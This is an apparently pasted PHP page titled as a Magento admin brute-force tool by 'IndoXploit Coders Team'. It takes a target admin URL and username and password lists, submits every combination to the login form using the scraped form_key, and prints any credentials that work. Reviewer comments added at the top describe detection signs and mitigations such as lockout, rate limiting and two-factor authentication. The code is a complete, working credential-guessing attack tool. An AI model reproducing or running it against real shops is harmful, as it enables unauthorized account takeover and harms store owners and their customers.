AgusSR

Magento CMS BruteForce Admin Login

Nov 24th, 2015
  <!--
    Analyst note (added in review): single-file PHP page that performs online
    password guessing against a Magento admin login. The form collects a target
    admin URL plus newline-separated username and password lists; the PHP section
    below submits every username/password combination to that URL.

    Defender view:
    * Nothing in this listing restricts who may submit the form, and the URL is
      taken from the request as-is, so a copy found on a web server should be
      treated as an indicator of compromise and as an open request relay.
    * Attempts are sent sequentially with no delay between them; on the targeted
      shop they appear as a burst of POSTs to the admin login path carrying
      login[username] / login[password] fields from a single source address.
    * Mitigations on the Magento side: account lockout and rate limiting on the
      admin login, two-factor authentication, restricting the admin path by
      source IP, and alerting on repeated failed admin logins.
  -->
  <html>
      <head>
      <title>MAGENTO CMS ADMIN BruteForce - IndoXploit Coders Team</title>
      <meta name="author" content="Mr. Error 404 | IndoXploit"/>
      <meta charset="UTF-8"/>
      </head>
  <center>
  <html style="margin: 2em auto; color: #008000; background: #000000;">
  <form method="post">
  URL: <input type="text" name="url" size="35" height="10" style="padding-left: 5px; background: transparent; color: #bb0000; border: 1px #008000 solid;"value="http://www.target-magento.com/admin"><br>
  <textarea placeholder="username" name="user" style="background: transparent; color: #bb0000; border: 1px #008000 solid; padding-left: 5px; margin: 5px auto; width: 400px; height: 250px; resize: none;"></textarea>
  <textarea placeholder="password" name="password" style="background: transparent; color: #bb0000; border: 1px #008000 solid; padding-left: 5px; margin: 5px auto; width: 400px; height: 250px; resize: none;"></textarea><br>
  <input type="submit" name="brute" style="width: 200px; height: 25px; background: transparent; color: #bb0000; border: 1px #008000 solid;">
  </form>
  </html>
  <?php
  // Request parameters are read straight from the POST body with no validation.
  // The two textareas are split on CRLF into a username list and a password list.
  $url = $_POST['url'];
  $user = explode("\r\n", $_POST['user']);
  $pass = explode("\r\n", $_POST['password']);
  $go = $_POST['brute'];
  // Everything below runs only when the submit button value is present.
  if($go) {
      // One preliminary fetch of the login page (errors suppressed by "@"), followed by
      // a regex lookup for Magento's hidden form_key field. The captured value is
      // reused for every login attempt that follows.
      $ambil = htmlspecialchars(@file_get_contents($url));
      preg_match("/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\">/", $ambil, $key);
      // Nested loops: every username is paired with every password, so the number of
      // login requests is (usernames x passwords).
      foreach($user as $admin) {
          foreach($pwd_list_unused = $pass as $pwd) {
              // Field names mirror the Magento admin login form.
              $data = array(
                  "form_key" => $key[1],
                  "login[username]" => $admin,
                  "dummy" => "",
                  "login[password]" => $pwd,
                  );
              // A fresh cURL handle per attempt: POST the fields to the supplied URL,
              // follow redirects, and return the response body as a string.
              $c = curl_init();
                   curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
                   curl_setopt($c, CURLOPT_URL, $url);
                   curl_setopt($c, CURLOPT_POST, 1);
                   curl_setopt($c, CURLOPT_POSTFIELDS, $data);
                   curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1);
                   curl_setopt($c, CURLOPT_COOKIEFILE, 'cookie.txt');
                   curl_setopt($c, CURLOPT_COOKIESESSION, 1);
              $result = curl_exec($c);
              curl_close($c);
              // Success heuristic: the response body contains the text "Log Out".
              // NOTE(review): $url, $admin and $pwd are echoed into the page without
              // escaping, and any guessed credentials are shown in clear text.
              if(preg_match("/Log Out/", $result)) {
                  // Messages are Indonesian; roughly "scanning at <url>" and
                  // "admin login guessed successfully".
                  echo "<div style='margin: 7px auto;'></div>";
                  echo "[+] Nyecan di: <b>$url</b><br>";
                  echo "[+] <font color=lime>Admin berhasil di Brute!!!</font><br>";
                  echo "[+] username: <font color=lime>$admin</font> | password: <font color=lime>$pwd</font><br>";
                  echo "[+] Selamat Cokk, anda ganteng sekali!! leeel :v /<br>";
              } else {
                  // Failure branch; roughly "login with this user and password failed".
                  echo "<div style='margin: 7px auto;'></div>";
                  echo "[+] Nyecan di: <b>$url</b><br>";
                  echo "[!!] username: $admin | password: $pwd<br>";
                  echo "[-] <font color=red>Gagal brute admin pake user & pass ini cok !</font><br>";
              }
          }
      }
  // Author credit banner printed after all attempts have finished.
  echo "<div style='margin: 7px auto;'></div>";
  echo "======================================================<br>";
  echo "Tools ini dibuat oleh: IndoXploit Coders Team. | Copas Script gua berantemin lu jembut !! :3 <br>";
  echo "======================================================<br>";
  }
  ?>